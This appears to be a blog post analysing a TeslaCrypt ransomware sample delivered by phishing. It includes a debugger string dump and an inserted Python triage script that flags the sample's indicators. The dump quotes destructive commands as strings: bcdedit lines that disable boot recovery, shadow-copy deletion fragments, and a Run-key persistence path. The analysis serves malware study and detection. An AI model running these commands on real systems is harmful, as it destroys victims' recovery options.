Posted by @Dkavalanche (http://www.blogger.com/profile/05803700040566483414), published 2015-12-10T06:45:00-08:00, updated 2015-12-10T06:45:39-08:00<br />
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><b>Ransomware Campaign: TeslaCrypt</b></span></span><div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">Yesterday I received a phishing e-mail with an unpleasant gift: a data encryptor.</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span><div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">The malicious e-mails arrive with a .zip attachment containing an encoded JavaScript file.</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">Your order #39203250 - Corresponding Invoice #1AF14884</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTwiEwfPue46jzxjwzXHoduyZXDY1yXWrQlyEbhPaUPhaptY4gU3fFqrQEhCwsIM_g2xWcvu831Go_zTetZxSnPdgQBZ2dzFsorPbtbnLgT9Hxhw9k66RAGI2RRgZdoEyGCaNhST1FhCY/s1600/fake.png" imageanchor="1"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTwiEwfPue46jzxjwzXHoduyZXDY1yXWrQlyEbhPaUPhaptY4gU3fFqrQEhCwsIM_g2xWcvu831Go_zTetZxSnPdgQBZ2dzFsorPbtbnLgT9Hxhw9k66RAGI2RRgZdoEyGCaNhST1FhCY/s640/fake.png" width="640" /></a></span></span></div>
<span style="font-family: inherit;"><span style="color: #222222;"><br /></span><span style="color: #222222;">Obfuscated JavaScript.</span></span><br />
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHhpndSQ6nUxiI_9adYLrEGVLP3hUbSapYy-Pq2HQU-Q8_WZ8m0h8YF40PXvWTcirjydLLyhSDieCc6CfHmhXkqT5l0BcE4JRVulxKbtTF85njCpRTqvsv75CZvALFfB7-skVqBag0pxE/s1600/invoiceJS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHhpndSQ6nUxiI_9adYLrEGVLP3hUbSapYy-Pq2HQU-Q8_WZ8m0h8YF40PXvWTcirjydLLyhSDieCc6CfHmhXkqT5l0BcE4JRVulxKbtTF85njCpRTqvsv75CZvALFfB7-skVqBag0pxE/s320/invoiceJS.png" width="320" /></a></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">When executed, it downloads and runs an .exe file.</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh8j8G-fwQH-SFc-oNHyg4pSLYDMJX6e96F1uBp4YuAS_Wz6tBCYA7cbq-XFCE4m5O7T5zlCdPv8yTAnWAhyphenhyphenaIzpYccwsG1qom92y84FOoDOh_RFSlCyV4D3t37E6s-Gqmo7p45aj5xKw/s1600/333.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh8j8G-fwQH-SFc-oNHyg4pSLYDMJX6e96F1uBp4YuAS_Wz6tBCYA7cbq-XFCE4m5O7T5zlCdPv8yTAnWAhyphenhyphenaIzpYccwsG1qom92y84FOoDOh_RFSlCyV4D3t37E6s-Gqmo7p45aj5xKw/s400/333.png" /></a></div>
<div>
<span style="color: #222222;"><div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;">http://urlquery.net/report.php?id=1449670303414</span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;"><br /></span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;">Analysis of the threat on VT </span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;"><br /></span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;">https://www.virustotal.com/es-ar/file/832b72759899c9b6c4aa41afc8640d37a7be7c60797bcd120a019b867d8fa492/analysis/</span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpT34_O-OzFtdcnjO2igAzT5bxAl8PpVJXnmfbPK1VBgSK92lQfkeLWhQMTP3hKnTKhbAcwOFlI7mdF9O9ehV84IxYitpFJ7uaFdQqzcsiekzUFyn2AudRT8KIXqotGW6RwMXrltrA8Cs/s1600/vt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpT34_O-OzFtdcnjO2igAzT5bxAl8PpVJXnmfbPK1VBgSK92lQfkeLWhQMTP3hKnTKhbAcwOFlI7mdF9O9ehV84IxYitpFJ7uaFdQqzcsiekzUFyn2AudRT8KIXqotGW6RwMXrltrA8Cs/s320/vt.png" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;">Unpacking the malware.</span></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLo_gRELZAtYIJI_L5nRqvIl2ety_G8z__1sDHAcHAGzhf7nHMdrnWvfwBpFTKqBOnu3wodzqM-8apa9M4e3vlg0HRyq5pXpMoctq2hcmrreOjLuI_tRWOI06rwOzGHoI1JQ9Lq-_h-YM/s1600/BP1.png" imageanchor="1"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLo_gRELZAtYIJI_L5nRqvIl2ety_G8z__1sDHAcHAGzhf7nHMdrnWvfwBpFTKqBOnu3wodzqM-8apa9M4e3vlg0HRyq5pXpMoctq2hcmrreOjLuI_tRWOI06rwOzGHoI1JQ9Lq-_h-YM/s320/BP1.png" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdpSAeI_zuh9lm82t5ByVCd8O1lvDQ3pw44qP4aXB6AH7HIbqIUMmPkQvt8YdPgl3RGqMnnJO_4I7dUzsapDEt_rBSfYnMsADoRo-WFz10DsMNw2zku8kbi7Ca3qE5NyhYOAGDAfV30-I/s1600/BP0.png" imageanchor="1"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdpSAeI_zuh9lm82t5ByVCd8O1lvDQ3pw44qP4aXB6AH7HIbqIUMmPkQvt8YdPgl3RGqMnnJO_4I7dUzsapDEt_rBSfYnMsADoRo-WFz10DsMNw2zku8kbi7Ca3qE5NyhYOAGDAfV30-I/s320/BP0.png" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><b><br /></b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"><b>Interesting Strings</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">Address Disassembly Text string</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0040103B PUSH dump.004322C8 UNICODE "Software\%s"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0040108A PUSH dump.004322E0 UNICODE "data"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0040111F PUSH dump.004322EC ASCII "Software\%S"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401142 PUSH dump.004322F8 ASCII "S-1-5-18\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004011DB PUSH dump.00432304 ASCII "data"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401280 PUSH dump.0043230C UNICODE "\S-1-5-18\Software\zsys\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004012AC PUSH dump.00432340 UNICODE "ID"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004012DC PUSH dump.00432348 UNICODE "%X%X%X%X"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401313 PUSH dump.00432348 UNICODE "%X%X%X%X"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401368 PUSH dump.0043235C UNICODE "Software\zsys\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401386 PUSH dump.00432340 UNICODE "ID"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004013C6 PUSH dump.00432340 UNICODE "ID"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004013FC PUSH dump.00432348 UNICODE "%X%X%X%X"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401433 PUSH dump.00432348 UNICODE "%X%X%X%X"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00412BAE PUSH dump.00438194 ASCII "sdflk35jghs"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00412BD1 MOV DWORD PTR SS:[EBP-6C],dump.00438194 ASCII "sdflk35jghs"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00412F99 MOV ESI,dump.00432EF0 ASCII ".dll"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041373F PUSH dump.00433010 UNICODE "how_recover"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041374B PUSH dump.00433028 UNICODE "%s\%s+%s.txt"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004137A7 PUSH dump.00433010 UNICODE "how_recover"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004137B3 PUSH dump.00433044 UNICODE "%s\%s+%s.html"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413975 ASCII "Qh",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004139E0 MOV ECX,dump.00433060 UNICODE "A:\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413A30 MOV ECX,dump.00433068 UNICODE "B:\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413C10 PUSH dump.00433070 UNICODE "\*.*"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413C9F MOV EAX,dump.00433080 UNICODE ".."</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413EBD MOV EAX,dump.00433088 UNICODE "recove"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413ECD MOV EAX,dump.00433098 UNICODE ".vvv"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413FF0 PUSH dump.00433098 UNICODE ".vvv"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A306 PUSH dump.0043312C ASCII "Cr"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A31D PUSH dump.00433130 ASCII "ypted"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A381 PUSH dump.004330E0 ASCII "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A4E7 PUSH dump.004324AC ASCII "2.2.0"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A6F8 PUSH dump.00433138 ASCII "%s?%s"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A744 PUSH dump.00433140 ASCII "GET"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A7B8 PUSH dump.00433144 ASCII "INSERTED"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A85C PUSH dump.004330E0 ASCII "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace;">0041A874 PUSH dump.00433150 UNICODE "http://myexternalip.com/raw"</span></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
</span><span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D688 PUSH dump.004380F4 UNICODE "%s\system32\cmd.exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D75E MOV DWORD PTR SS:[EBP-854],dump.0043813C UNICODE "runas"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D82D PUSH dump.00438148 ASCII "vssa"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D843 PUSH dump.00438150 ASCII "dmin"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D859 PUSH dump.00438158 ASCII ".exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D881 PUSH dump.00438160 ASCII "delete "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D897 PUSH dump.00438168 ASCII "shadows "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D8B0 PUSH dump.00438174 ASCII "/all "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D8C6 PUSH dump.0043817C ASCII "/Quiet "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D8F8 MOV DWORD PTR SS:[EBP-23C],dump.00438184 ASCII "open"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D90A MOV DWORD PTR SS:[EBP-23C],dump.0043818C ASCII "runas"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DAFD PUSH dump.004335E8 ASCII "Qwi+Z2ptKhg884OCgBjab+QQ1zaBfozWc6txcHgkc6+AEn1w8gFPofQSOA7x8Y=="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DB1D PUSH dump.00433598 ASCII "xqTHKxhHf5KXoX/eFiktjVyAZ6uGJ2BLl7SzVC2ueVDnONLTeN2Q0HW7rmeSlcHFEnI12UrR"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DB40 PUSH dump.00433550 ASCII "FSVvmBCBk7wMEoif5nZjWH2tFlEkUQwgKwPy/04w8E/WLQlp4ogUohBlNgZ9YQ=="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DB62 PUSH dump.00433508 ASCII "l2Hd+QlQKxTunawJxW1JslefFsEIYc79d+JZDiPXpj3qNRCiQgVitrCMwwlKju=="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DB82 PUSH dump.004334B8 ASCII "F2UeThCgQBrhu5kWIiCOhuvLGNBAhWdhD5T4Ukihd+Jaq26PBSLnxjMN0BHbDtJYoZKoigO5"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DBA6 PUSH dump.00433468 ASCII "5p32jJULMx6o6X1+OfAh17uh5oGV9Czt8RLgjANQsmmmqxopIg/vQdShWSchJi9IpKlrPXAb"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DBCC PUSH dump.00433420 ASCII "6hZ3J2jHDTP8JtXjBjr+wNn+4a/uKzK1vyouD8qyHswLsR7E9X2Wf9SgwAlRna=="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DF89 PUSH dump.004381CC ASCII "Wow64DisableWow64FsRedirection"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DF91 PUSH dump.004381EC ASCII "Wow64RevertWow64FsRedirection"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DFE1 PUSH dump.0043820C UNICODE "\recover_file_"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E012 PUSH dump.0043822C UNICODE ".txt"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E07F PUSH dump.00438238 UNICODE ":Zone.Identifier"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E0AE PUSH dump.0043825C ASCII "SeDebugPrivilege"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E16B PUSH dump.00438270 UNICODE "2134-1234-1324-2134-1324-2134"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E1EF PUSH dump.004382AC ASCII "bcdedit.exe /set {current} bootems off"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E1FC PUSH dump.004382D4 ASCII "bcdedit.exe /set {current} advancedoptions off"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E209 PUSH dump.00438304 ASCII "bcdedit.exe /set {current} optionsedit off"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E216 PUSH dump.00438330 ASCII "bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E223 PUSH dump.00438370 ASCII "bcdedit.exe /set {current} recoveryenabled off"</span><br />
<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E454 PUSH dump.004383B8 UNICODE "%s\Howto_RESTORE_FILES.txt"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E48F PUSH dump.004383FC UNICODE "%s\Howto_RESTORE_FILES.html"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E4C3 PUSH dump.00438434 UNICODE "%s\Howto_RESTORE_FILES.bmp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E78B PUSH dump.0043846C UNICODE "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E7E3 PUSH dump.00438478 UNICODE "%s\%sacroic.exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E904 PUSH dump.00438498 UNICODE "/c "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E91A PUSH dump.004384A0 UNICODE "DE"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E930 PUSH dump.004384A8 UNICODE "L "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E97B PUSH dump.004384B0 UNICODE "ComSpec"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E9EE PUSH dump.004384C0 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041EA12 PUSH dump.004384FC UNICODE "EnableLinkedConnections"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041EA58 PUSH dump.004333C0 UNICODE "Software\Microsoft\Windows\CurrentVersion\Run"</span><br />
<br />
<b>The trojan checks the victim's IP address with the following service</b><br />
"http://myexternalip.com/raw"<br />
<br />
<br />
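As an added example (not code from the post or from the TeslaCrypt sample), the Python script below parses a debugger string listing in the "Address Disassembly Text string" shape shown above and triages it for the destructive behaviours visible there: shadow-copy deletion, boot-recovery tampering via bcdedit, the ransom-note names, the .vvv extension and the external IP lookup. The point it makes is that the sample pushes "vssa", "dmin", ".exe", "delete ", "shadows " as separate fragments, so a plain strings grep for "vssadmin" finds nothing; the script reassembles runs of adjacent short PUSHed strings before matching. The listing lines are copied from the dump above; the fragment-length and address-gap thresholds are my assumptions.<br />

```python
import re

# Constructed sample: lines in the shape of the debugger string listing above
# ("Address  Disassembly  Text string"), copied from the TeslaCrypt dump in the post.
STRING_LISTING = r"""
0041D688 PUSH dump.004380F4 UNICODE "%s\system32\cmd.exe"
0041D82D PUSH dump.00438148 ASCII "vssa"
0041D843 PUSH dump.00438150 ASCII "dmin"
0041D859 PUSH dump.00438158 ASCII ".exe"
0041D881 PUSH dump.00438160 ASCII "delete "
0041D897 PUSH dump.00438168 ASCII "shadows "
0041D8B0 PUSH dump.00438174 ASCII "/all "
0041D8C6 PUSH dump.0043817C ASCII "/Quiet "
0041D8F8 MOV DWORD PTR SS:[EBP-23C],dump.00438184 ASCII "open"
0041E1FC PUSH dump.004382D4 ASCII "bcdedit.exe /set {current} advancedoptions off"
0041E223 PUSH dump.00438370 ASCII "bcdedit.exe /set {current} recoveryenabled off"
0041E454 PUSH dump.004383B8 UNICODE "%s\Howto_RESTORE_FILES.txt"
0041A306 PUSH dump.0043312C ASCII "Cr"
0041A31D PUSH dump.00433130 ASCII "ypted"
0041A874 PUSH dump.00433150 UNICODE "http://myexternalip.com/raw"
00413ECD MOV EAX,dump.00433098 UNICODE ".vvv"
"""

LINE_RE = re.compile(
    r'^(?P<addr>[0-9A-Fa-f]{8}) (?P<disasm>.*?) (?P<enc>ASCII|UNICODE) "(?P<text>.*)"$'
)


def parse_listing(text):
    """Return (address, mnemonic, encoding, string) tuples for every parsable line."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append((int(m["addr"], 16), m["disasm"].split()[0], m["enc"], m["text"]))
    return entries


FRAGMENT_MAX = 10   # assumption: pieces this short were split on purpose
RUN_GAP = 0x40      # assumption: PUSHes this close together feed the same call


def join_fragments(entries):
    """Glue runs of adjacent PUSHed short strings back together, in listing order."""
    joined, run = [], []

    def flush():
        if len(run) > 1:
            joined.append("".join(s for _, s in run))
        run.clear()

    for addr, mnemonic, _enc, s in entries:
        is_fragment = mnemonic == "PUSH" and len(s) <= FRAGMENT_MAX
        if is_fragment and run and 0 <= addr - run[-1][0] <= RUN_GAP:
            run.append((addr, s))
            continue
        flush()
        if is_fragment:
            run.append((addr, s))
    flush()
    return joined


# Behaviours worth flagging, all taken from strings shown in the post.
INDICATORS = {
    "shadow_copy_deletion": re.compile(r"vssadmin\.exe\s*delete\s+shadows", re.I),
    "boot_recovery_disabled": re.compile(
        r"bcdedit\.exe /set \{current\} (recoveryenabled off|bootstatuspolicy IgnoreAllFailures)", re.I),
    "ransom_note_name": re.compile(r"Howto_RESTORE_FILES|how_recover|recover_file_", re.I),
    "encrypted_extension": re.compile(r"^\.vvv$", re.I),
    "external_ip_lookup": re.compile(r"myexternalip\.com", re.I),
}


def triage(listing):
    """Map each indicator to the raw or reassembled strings that matched it."""
    entries = parse_listing(listing)
    candidates = [s for *_, s in entries] + join_fragments(entries)
    hits = {name: [] for name in INDICATORS}
    for s in candidates:
        for name, rx in INDICATORS.items():
            if rx.search(s):
                hits[name].append(s)
    return hits


if __name__ == "__main__":
    for name, matched in triage(STRING_LISTING).items():
        print(f"{name:24s} {matched}")
```

The reassembled "vssadmin.exedelete shadows /all /Quiet " has no separator between program and arguments because the fragments are passed to the call separately; the regex tolerates that, and on an endpoint the same behaviour is caught by alerting on process creation of vssadmin.exe with "delete shadows" and of bcdedit.exe with "recoveryenabled off".<br />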
Traffic.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiNb1kqVK8PXLlFx58Gx0KwqWDKhLUoQU5S9k8ErjXof2d7sXw4zbiA-3K1lL-2GvLyZx4WHFVjjNVj5AMN044dEh73JOUFsTX8CF09ccVyLOg6In8vfOUvLtU9YfigdU2V610zHmec9k/s1600/comunicacion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiNb1kqVK8PXLlFx58Gx0KwqWDKhLUoQU5S9k8ErjXof2d7sXw4zbiA-3K1lL-2GvLyZx4WHFVjjNVj5AMN044dEh73JOUFsTX8CF09ccVyLOg6In8vfOUvLtU9YfigdU2V610zHmec9k/s640/comunicacion.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After obfuscating (encrypting) the data, this HTML is displayed</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgi9c46lteY_atZm8rgdrcaxHdm70dMbvo249MPVSS9fNuVzi7iV-vI4XkSa3qs63Y8ono2v-MRA8gY9QOL6kFoC_2mWLB4ZCVGjJIuvtp_jecVtrLGuR57rCEGvy5A_TQ3nWWuEcTYhI/s1600/Clipboard02.png" imageanchor="1"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgi9c46lteY_atZm8rgdrcaxHdm70dMbvo249MPVSS9fNuVzi7iV-vI4XkSa3qs63Y8ono2v-MRA8gY9QOL6kFoC_2mWLB4ZCVGjJIuvtp_jecVtrLGuR57rCEGvy5A_TQ3nWWuEcTYhI/s320/Clipboard02.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
